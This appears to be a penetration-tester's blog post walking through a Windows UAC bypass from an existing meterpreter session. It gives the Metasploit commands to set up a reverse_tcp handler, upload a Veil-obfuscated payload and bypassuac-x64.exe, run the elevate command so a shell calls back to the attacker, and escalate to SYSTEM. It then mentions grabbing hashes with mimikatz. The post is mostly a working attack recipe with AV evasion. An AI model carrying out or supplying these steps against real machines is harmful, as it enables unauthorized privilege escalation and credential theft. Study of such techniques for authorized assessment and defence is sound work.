Help! UAC is beating me!
The other day I was on an assessment where our attacks kept getting blocked. First, due to AV, which was quickly mitigated with Veil, then due to User Account Control (UAC). If you don’t know what UAC is, it is that annoying popup you get when something needs to escalate privileges on your Windows Vista+ box.
The purpose of this post is to show how to combat and bypass the UAC prompting, which can cause your exploits to fail.
**I am making the assumption that you already have a meterpreter shell on your target, you are running under an administrative account, and UAC is blocking your attempts to elevate to SYSTEM privileges.
First, the error message you likely will receive when trying to escalate to SYSTEM using ‘getsystem’ from the meterpreter prompt is something similar to:
[-] priv_elevat_getsystem: Operation failed: Access is denied.
Also note that you need to be connected as an administrative user to gain SYSTEM privileges this way, so I am assuming that is not your problem.
The problem is that UAC is squashing the ability to gain SYSTEM since it cannot prompt a user and get authorization. Well, all we need to do is create another listener on our box, copy over a new payload that will send the meterpreter back to our listener, copy over a file that will bypass UAC for our payload, and exploit. (Oh yeah, and profit!)
I like to use Veil to obfuscate my payloads, and while I will not cover Veil in this post, it is very effective in AV bypass. Once we have our payload ready, we need to start our metasploit listener.
Fire up metasploit with ‘msfconsole’. Type in ‘use exploit/multi/handler’.
Type in ‘show options’ to see what options you can setup.
(This was a trick as there are no options to the handler)
We need to setup our payload, which is what will run when the connection hits our box. To do so, type in ‘set PAYLOAD windows/meterpreter/reverse_tcp’ (The reason I am using this option is due to my Veil obfuscated payload having these options.)
We then tyoe ‘set LHOST <ourIP>’
Then ‘set LPORT <ourListeningPort>’
Finally, type in ‘exploit’
Congratulations, your listener is ready. Now, back to your regularly scheduled meterpreter shell. We need to upload two files to our target. The first is our obfuscated payload (mine is called cmd2.bat). the second is called bypassuac-x86.exe (or bypassuac-x64.exe if your target is running 64-bit, which mine is). To upload the file, type ‘upload /path/to/cmd2.bat c:\\tmp’ (Change the locations to where you want it), then do the same for the bypassuac-x64.exe. In Kali, it is located at ‘/opt/metasploit/apps/pro/msf3/data/post/bypassuac-x644.exe)
Once we have those files on our target, drop into a shell by typing, get this…, ‘shell’. Wow. That was hard.
We then use the command ‘c:\tmp\bypassuac-x64.exe elevate /c c:\tmp\cmd2.bat’ to bypass UAC.
Now look at your listener and you should see a connection being made, and eventually your meterpreter shell. Now, migrate to a system process, and type ‘getsystem’ and as they say “Winner Winner, Chicken Dinner!”
Now as SYSTEM, you can grab hashes, use mimikatz, and plenty of other mischievous things.
Remember, be good! And Happy Hacking!
